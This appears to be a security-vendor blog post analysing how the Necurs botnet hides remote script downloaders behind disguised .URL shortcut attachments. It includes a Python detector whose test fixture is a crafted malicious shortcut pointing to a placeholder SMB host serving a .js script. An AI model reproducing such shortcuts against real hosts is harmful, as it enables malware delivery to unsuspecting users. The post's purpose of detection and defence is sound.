By Miguel Ang
Necurs, a botnet malware that’s been around since 2012, has been improved with the hopes of better defeating cybersecurity measures — it was seen to evolve its second layer of infection using a .URL file (with remote script downloaders detected by Trend Micro as MAL_CERBER-JS03D, MAL_NEMUCOD-JS21B, VBS_SCARAB.SMJS02, and MAL_SCARAB-VBS30).
The Necurs Transformation: The .URL File Layer
Necurs is indeed constantly evolving to find other effective measures of tricking victims while defeating countermeasures waged against it. And since it has a highly effective botnet component that may also be sold as a service, malicious actors will continue to find ways to circumvent detection and improve how they trick the weakest link in cybersecurity — the user.
As security vendors are wise to Necurs’s traditional infection chain (a script, a macro, or archives containing certain file formats), the malware has started using an internet shortcut or .URL file to bypass detection.
Figure 1. A diagram of a previous version of the Necurs malware.
Figure 2. A diagram of the evolved Necurs malware.
Internet shortcuts, or .URLs, take the form of clickable icons and are objects used to access internet sites or web documents faster. Internet shortcuts have contents that are in the INI file format, which allows the changing of icons. Necurs malware uses this to its advantage by changing the folder icon to trick the victim into thinking that it’s a different file type, as it is less suspicious than clicking on a script. The .URL will then access the remote resource that downloads another downloader. The second downloader remotely executes the payload.
Figure 3. A .URL file disguised as a .ZIP file of a voicemail message
Notice that aside from the icons disguised as folders, the filenames were also crafted to resemble typical folder names such as IMG-20180404-9AC4DD, SCN-20180404-268CC1, and PIC-20180404-ADEEEE shown in Figure 2, to name a few.
Figure 4. A screen capture of an internet shortcut’s extracted files
Furthermore, the actual attachment archive does not contain the script downloader Necurs uses to download its payload. The .URL file accesses the remote server, which then executes through the Server Message Block (SMB) protocol — a tactic that may be successful in evading certain spam filters.
Figure 5. A screen capture of a remote file being accessed through the SMB protocol
The malware doesn’t stop at disguising .URL files. The latest Necurs variant no longer has the actual script downloader in its attachment. It only contains the internet shortcut to the remote site that contains the script that is then executed remotely. This means that it does not “download” the actual script on the victim’s machine. This is the closest it gets to its previous malicious spam runs: Attaching a URL in the email and tricking a victim into clicking on the link to download a malicious file.
Figure 6. A look at Necurs’s attachment
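The traits described above (an internet shortcut in INI format whose icon has been swapped, whose target is a remote SMB/UNC resource, and whose remote target is a script rather than a downloaded file) can be checked mechanically at the mail gateway or on an extracted attachment. The following is an added example written for this page, not Trend Micro's code or any product logic: it parses the `[InternetShortcut]` section of a .URL file, flags a remote UNC/`file://` target, a script extension, and a custom icon, and scans a ZIP attachment for such members. The script-extension list, the placeholder host `192.0.2.10`, the icon index, and the member file names are all constructed for the example.

```python
"""Added example (not from the original post): flag .URL files that use the
tricks described above. All sample inputs below are constructed placeholders."""
import configparser
import io
import re
import zipfile

# Extensions of the remote script downloaders the post describes (JS/VBS);
# the exact list is an assumption of this example.
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf")


def parse_url_file(text):
    """Return the [InternetShortcut] keys (lower-cased) or None if not a .URL file."""
    # .URL files are INI-style; only '=' is a delimiter so 'file://' values survive
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return dict(cp.items("InternetShortcut"))


def remote_host(url):
    """Host of a UNC or file:// target on another machine; None for local or web targets."""
    u = url.strip().replace("\\", "/")
    if u.lower().startswith("file:"):
        u = u[5:]
    m = re.match(r"^/{2,}([^/]+)/", u)
    if not m:
        return None
    host = m.group(1)
    if re.fullmatch(r"[A-Za-z]:", host) or host.lower() in ("localhost", "127.0.0.1"):
        return None  # drive letter or loopback: a local file, not an SMB share
    return host


def assess_url_file(text):
    """Return (verdict, findings) for the text of one .URL file."""
    fields = parse_url_file(text)
    if fields is None:
        return "not-a-url-file", []
    findings = []
    target = fields.get("url", "")
    host = remote_host(target)
    if host:
        findings.append(f"remote-smb-target:{host}")   # script fetched over SMB, never downloaded
    if target.strip().lower().endswith(SCRIPT_EXTENSIONS):
        findings.append("script-target")
    if fields.get("iconfile"):
        findings.append("custom-icon")                 # icon swapped to look like a folder
    if host and ("script-target" in findings or "custom-icon" in findings):
        return "suspicious", findings
    return "benign", findings


def scan_archive(zip_bytes):
    """Assess every .URL member of an attachment archive: {member: (verdict, findings)}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".url"):
                text = zf.read(name).decode("utf-8", errors="replace")
                results[name] = assess_url_file(text)
    return results


# Constructed samples: placeholder host (RFC 5737 range), assumed icon index, made-up names.
MALICIOUS_URL = (
    "[InternetShortcut]\r\n"
    "URL=file://\\\\192.0.2.10\\share\\voicemail.js\r\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
    "IconIndex=3\r\n"
)
BENIGN_URL = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"


def build_sample_archive():
    """In-memory ZIP with one masqueraded shortcut and one ordinary web shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("SCN-20180404-000000.url", MALICIOUS_URL)
        zf.writestr("readme.url", BENIGN_URL)
    return buf.getvalue()


if __name__ == "__main__":
    for member, (verdict, findings) in scan_archive(build_sample_archive()).items():
        print(member, verdict, findings)
```

The verdict deliberately requires a remote SMB target plus at least one masquerading trait, so an ordinary `https://` shortcut with a custom icon is not flagged; tighten or loosen that rule to match the mail flow being protected.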
Interestingly, Necurs does not infect computers using Russian as a language.
Further Evolution: Using QUANTLOADER
The use of QUANTLOADER may be twofold: First, it adds another download stage before it downloads the final payload, possibly to mix things up and evade behavioral detections. Secondly, QUANTLOADER is persistent in nature — it drops a copy of itself and creates an autorun registry entry so that it executes at startup.
Indicators of Compromise
Trend Micro solutions
To protect against Necurs and other continuously evolving spammed threats, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs. Deep Discovery is able to detect the remote script despite it not being downloaded to the physical endpoint.
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions. The spam mail used by this threat is detected on arrival by Trend Micro™ Email Reputation Services™, while our spam engine can detect Necurs’s technique: an archive containing an internet shortcut.
Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
A list of all the hashes (SHA-256) is in this appendix.